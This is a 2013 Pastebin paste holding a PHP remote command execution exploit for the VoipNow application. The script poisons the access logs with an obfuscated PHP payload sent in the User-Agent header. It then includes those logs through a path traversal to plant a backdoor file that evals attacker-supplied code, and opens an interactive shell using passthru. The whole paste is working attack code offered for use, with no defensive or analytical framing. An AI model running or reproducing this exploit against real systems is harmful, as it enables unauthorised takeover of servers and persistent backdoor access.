i-Hmx

VoipNow , Remote command execution Exploit

Apr 21st, 2013
952
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.11 KB | None | 0 0
  1. <?
  2. /*
  3. + Application : Voipnow
  4. | Download : http://4psa.com/
  5. | By Faris , AKA i-Hmx
  6. | n0p1337@gmail.com
  7. + sec4ever.com , 1337s.cc
  8. */
  9. echo "\n+-------------------------------------------+\n";
  10. echo "|                  VoipNow                  |\n";
  11. echo "|         PHP Code Injection Exploit        |\n";
  12. echo "|                  By i-Hmx                 |\n";
  13. echo "|                sec4ever.com               |\n";
  14. echo "|             n0p1337@gmail.com             |\n";
  15. echo "+-------------------------------------------+\n";
  16. echo "\n| Enter Target [Ip Only] # ";
  17. $target=trim(fgets(STDIN));
  18. echo "[+] Attacking $target\n";
  19. function faget($url,$post,$uagent){
  20. $curl=curl_init();
  21. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  22. curl_setopt($curl,CURLOPT_URL,$url);
  23. curl_setopt($curl, CURLOPT_USERAGENT, $uagent);
  24. curl_setopt($curl, CURLOPT_REFERER, "http://1337s.cc/index.php");
  25. curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
  26. curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
  27. curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
  28. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  29. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  30. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
  31. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  32. curl_setopt($curl, CURLOPT_HEADER, true);
  33. $exec=curl_exec($curl);
  34. curl_close($curl);
  35. return $exec;
  36. }
  37. $inj="<?php eval(url_decode('%24f%3Dfopen%28%27%2fusr%2flocal%2fvoipnow%2fadmin%2fhtdocs%2ftemplates_c%2f1337.php%27%2C%27w%2b%27%29%3B%24data%3D%27%3C%3F%20echo%20%22Faris%20on%20the%20mic%20%3AD%3Cbr%3E%3Cb%3En0p1337@gmail.com%3C%2fb%3E%3Cbr%3E-----------------%22%3B@eval%28base64_decode%28%24_POST%5Bfa%5D%29%29%3Becho%20%22-----------------%22%3B%20%3F%3E%27%3Bfwrite%28%24f%2C%24data%29%3Becho%20%22done%22%3B')); ?>";
  38. echo " | Injecting Payload(s) [ Time Depend on server traffic ]\n";
  39. echo "     + [0]";
  40. faget("https://".$target."/help/index.php?screen=../../../../../../../../usr/local/voipnow/admin/logs/access.log",'',$inj);
  41. echo " > Done\n";
  42. for($f=1;$f<4;$f++)
  43. {
  44. echo "     + [$f]";
  45. faget("https://".$target."/help/index.php?screen=../../../../../../../../usr/local/voipnow/admin/logs/access.log.$f",'',$inj);
  46. echo " > Done\n";
  47. }
  48. echo " | Testing Payload Execution\n";
  49. $fa1=faget("https://".$target."/templates_c/1337.php",'',"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
  50. if(!eregi("Faris on the mic :D",$fa1))
  51. {
  52. die("[+] Exploitation Failed :(\n");
  53. }
  54. echo " | Sending CMD test package\n";
  55. $cmd=faget($target."/templates_c/1337.php","fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
  56. if(!eregi("farsawy",$cmd))
  57. {
  58. die("   + Cmd couldn't executed but we can evaluate php code\n   + use : $target/templates_c/1337.php\n   Post : fa=base64code\n");
  59. }
  60. echo "| sec4ever shell online ;)\n\n";
  61. while(1){
  62. echo "i-Hmx@$host# ";
  63. $c=trim(fgets(STDIN));
  64. if($c=='exit'){die("[+] Terminating\n");}
  65. $payload=base64_encode("passthru('$c');");
  66. $fuck=faget("https://".$target."/templates_c/1337.php","fa=$payload","Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
  67. $done=kastr($fuck,"-----------------","-----------------");
  68. echo "$done\n";
  69. }
  70. ?>
Add Comment
Please, Sign In to add comment